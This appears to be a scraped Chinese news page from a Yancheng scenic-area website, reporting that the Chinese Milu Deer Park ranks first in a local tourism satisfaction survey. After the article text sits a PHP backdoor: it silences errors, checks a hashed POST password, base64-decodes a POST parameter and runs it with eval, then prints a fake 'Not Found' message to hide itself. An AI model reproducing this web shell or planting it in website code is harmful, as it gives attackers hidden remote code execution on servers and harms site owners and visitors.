最新要闻

首页 > 最新要闻 >

    中华麋鹿园荣登盐城景区旅游满意度榜首

              由盐阜大众报报业集团主办的首届“盐城旅游满意度调查”活动即将收官。活动于今年五月中旬起,两个月的时间内,活动得到了广大市民、各县市区、景区以及盐城所有旅游从业者的积极响应和参与。
        截至713日,县市区旅游满意度排行中大丰、盐都、亭湖分别位列三甲,景区旅游满意度排行中,中华麋鹿园位居第一,大纵湖旅游度假区、荷兰花海位列第二、第三。中华麋鹿园取得超高的旅游满意度,这不光是广大游客对景区的认可,也是景区所有工作人员努力的成果。目前,投票还在紧张持续地进行中,我们会再接再厉,在景区的各项建设上加把劲,日后争取为游客们带来更好的旅游体验。

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>